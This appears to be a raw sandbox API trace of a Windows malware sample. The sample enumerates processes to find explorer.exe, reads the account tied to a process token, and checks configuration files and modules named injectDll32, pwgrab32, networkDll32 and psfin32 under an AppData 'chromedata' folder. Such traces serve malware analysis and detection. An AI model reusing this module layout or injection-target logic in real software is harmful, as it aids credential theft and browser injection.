	[0232.148] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0232.149] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0232.149] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0232.150] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0232.150] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0232.151] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0232.151] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0232.152] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0232.152] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0232.153] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0232.153] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0232.153] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0232.154] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0232.154] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0232.154] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0232.155] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0232.155] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0232.156] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0232.156] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0232.157] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0232.157] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0232.158] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0232.158] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0232.159] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0232.159] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.177] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.177] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.178] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.178] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.179] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.179] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.180] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.180] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0232.181] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0232.181] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0232.183] lstrcmpW (lpString1="explorer.exe", lpString2="dllhost.exe") returned 1
	[0232.183] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.184] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.184] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.184] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.184] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0232.185] CloseHandle (hObject=0x5f8) returned 1
	[0232.185] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b79b0
	[0232.185] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b79c8
	[0232.185] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311318
	[0232.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x5f8
	[0232.185] OpenProcessToken (in: ProcessHandle=0x5f8, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x5d8) returned 1
	[0232.185] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0232.185] GetLastError () returned 0x7a
	[0232.185] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6298
	[0232.186] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x22a6298, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a6298, ReturnLength=0x128c98) returned 1
	[0232.186] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a62a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0232.186] CloseHandle (hObject=0x5d8) returned 1
	[0232.186] CloseHandle (hObject=0x5f8) returned 1
	[0232.186] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c68
	[0232.186] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b79b0) returned 1
	[0232.186] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777dd0
	[0232.186] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b79b0
	[0232.186] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311528
	[0232.186] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0232.186] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0232.186] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0232.186] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0232.187] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0232.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777dd0) returned 1
	[0232.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311528) returned 1
	[0232.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b79b0) returned 1
	[0232.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b79c8) returned 1
	[0232.187] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225da8
	[0232.187] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0232.187] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0232.187] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0232.187] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0232.187] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0232.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225da8) returned 1
	[0232.187] Sleep (dwMilliseconds=0x4e20) 
	[0232.255] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.256] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.256] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.256] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.256] CloseHandle (hObject=0x5f8) returned 1
	[0232.256] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.256] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.256] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.256] CloseHandle (hObject=0x5f8) returned 1
	[0232.256] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.256] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.256] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.256] CloseHandle (hObject=0x5f8) returned 1
	[0232.257] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.257] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.257] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.257] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.257] CloseHandle (hObject=0x5f8) returned 1
	[0232.257] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.257] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.257] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.257] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.257] CloseHandle (hObject=0x5f8) returned 1
	[0232.257] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.257] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.257] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.257] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.257] CloseHandle (hObject=0x5f8) returned 1
	[0232.257] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.257] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.258] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0232.258] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0232.258] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70fa1b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6a40
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70fa1b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0232.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b79c8
	[0232.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x234f30
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0232.258] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b79c8, Size=0x10) returned 0x22b79b0
	[0232.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22caa30
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0232.258] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b79b0, Size=0x10) returned 0x22b79c8
	[0232.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2738590
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0232.258] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b79c8, Size=0x10) returned 0x22b79b0
